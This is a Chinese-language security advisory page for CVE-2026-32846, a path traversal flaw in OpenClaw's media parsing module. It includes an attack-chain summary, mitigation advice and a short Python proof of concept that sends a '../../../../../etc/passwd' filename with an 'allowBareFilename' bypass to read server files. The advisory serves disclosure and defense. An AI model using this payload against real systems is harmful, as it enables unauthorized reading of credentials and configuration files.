IPBUF安全漏洞报告
English
CVE-2026-32846 CVSS 7.5 高危

CVE-2026-32846 OpenClaw路径遍历漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-32846
漏洞类型
路径遍历
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

路径遍历OpenClaw信息泄露文件读取CVE-2026-32846

漏洞概述

OpenClaw在2026.3.28之前的版本中存在严重的路径遍历安全漏洞。该漏洞位于媒体解析模块,由于isLikelyLocalPath()和isValidMedia()函数的路径验证逻辑存在缺陷,且受到allowBareFilename旁路的影响,攻击者无需用户交互或身份认证即可远程利用此漏洞。攻击者可以通过构造特殊的恶意请求绕过沙箱限制,读取服务器上的任意敏感文件,包括系统配置、环境变量及SSH密钥,造成严重的信息泄露风险。

技术细节

该漏洞的核心在于OpenClaw处理媒体文件路径时的安全校验机制失效。在受影响版本中,系统依赖isLikelyLocalPath()和isValidMedia()两个函数来确保请求的文件路径位于预期的安全沙箱内。然而,这两个函数的校验逻辑存在盲点,未能妥善处理特定的路径字符组合。攻击者可以利用allowBareFilename这一特性作为旁路手段,构造包含“../”序列或绝对路径的恶意输入。当应用解析这些输入时,由于校验函数被绕过,系统未能将路径限制在合法目录下,从而允许攻击者访问文件系统的任意位置。这种未经授权的文件读取能力使得攻击者能够窃取关键凭据和配置信息,为进一步的渗透攻击提供基础。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的OpenClaw实例,并确认其版本低于2026.3.28。
STEP 2
漏洞利用
攻击者向媒体解析接口发送特制的HTTP请求,利用allowBareFilename旁路和路径遍历序列(../)绕过isLikelyLocalPath()和isValidMedia()的检查。
STEP 3
数据窃取
服务器响应返回目标文件的内容(如/etc/passwd、SSH密钥),攻击者保存该信息用于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit PoC for CVE-2026-32846 # This script demonstrates the path traversal vulnerability in OpenClaw. def exploit(target_url): # The endpoint responsible for media parsing endpoint = f"{target_url}/api/media/parse" # Payload utilizing the allowBareFilename bypass and path traversal # Attempting to read /etc/passwd payload = { "filename": "../../../../../etc/passwd", "allowBareFilename": "true", # Bypass mechanism "action": "read" } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Sensitive data found:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://vulnerable-openclaw-instance.com" exploit(target)

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施
如果无法立即升级,建议在网络上禁用受影响的媒体解析功能端点,或通过反向代理服务器严格过滤用户输入中的路径特殊字符,以阻断攻击路径。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表